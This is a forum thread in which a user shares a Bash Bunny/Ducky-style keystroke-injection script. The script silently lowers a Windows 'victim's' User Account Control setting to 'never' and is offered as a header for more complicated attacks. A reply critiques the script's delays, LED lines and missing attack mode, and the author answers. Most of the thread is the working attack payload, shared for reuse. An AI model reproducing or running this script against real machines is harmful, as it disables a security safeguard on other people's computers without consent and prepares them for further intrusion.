Onus Posted March 14, 2017 Share Posted March 14, 2017 (edited) I just refractored an old ducky script I wrote for lowering the user account control settings on a victem's machine.. Its a bit dirty of a way to go about it, but seems to work on a windows ten machine no matter what the user's current account settings are. Its nt really a stand alone but more of a header for more complicated attacks. LED R G 300 Q DELAY 3000 LED B 100 Q DELAY 100 # Downgrade user account security to NEVER # Minimize all windows Q GUI d Q GUI r Q DELAY 300 Q STRING useraccountcontrolsettings Q ENTER # deal with potential first prompt if security is too high in a way that won't mess with other possible outcomes Q DELAY 300 Q DOWNARROW Q UPARROW Q DELAY 300 Q ENTER # lower the bar Q DELAY 500 Q DOWNARROW Q DOWNARROW Q DOWNARROW Q DOWNARROW Q DELAY 300 Q TAB Q ENTER Q DELAY 500 # deal with potential final prompt if user had high level Q LEFTARROW Q ENTER Q DELAY 500 Just thought I'd share, get thoughts, maybe save someone one some time dancing around all the possible keyboard combinations to deal with for a given user's settings and the. Windows 7+ Edited March 14, 2017 by Onus Quote Link to comment Share on other sites More sharing options...
GermanNoob Posted March 14, 2017 Share Posted March 14, 2017 4 hours ago, Onus said: LED R G 300 Q DELAY 3000 LED B 100 Q DELAY 100 I don't have my windows vm ready to test the overall script, but at least I don't understand your first four lines of code... setting the LED pause the HID to make keystrokes? You haven't typed anything by now... I'm not sure if a beginning pause is needed on the BashBunny as I don't know when the script will be executed (after the target host accepted the attack mode?) setting the LED to blue another pause for the HID (this one can definitely be removed and from my point of view at least on of the LED settings). And you are missing to set the attack mode... 1 Quote Link to comment Share on other sites More sharing options...
Onus Posted March 14, 2017 Author Share Posted March 14, 2017 10 minutes ago, GermanNoob said: I don't have my windows vm ready to test the overall script, but at least I don't understand your first four lines of code... setting the LED pause the HID to make keystrokes? You haven't typed anything by now... I'm not sure if a beginning pause is needed on the BashBunny as I don't know when the script will be executed (after the target host accepted the attack mode?) setting the LED to blue another pause for the HID (this one can definitely be removed and from my point of view at least on of the LED settings). And you are missing to set the attack mode... Sorry my bad on the attack mode.. I missed it in my copy/paste.. 2, This attack mode was both HID and Storage.. the initial delay is because I found on some windows machines, the storage mode will take a bit and open a finder window.. to make sure that finder window doesn't take focus in the middle of my script, i wait before typing anything.... 1& 3. The LED stuff is preference obviously.. Quote Link to comment Share on other sites More sharing options...
Recommended Posts
Join the conversation
You can post now and register later. If you have an account, sign in now to post with your account.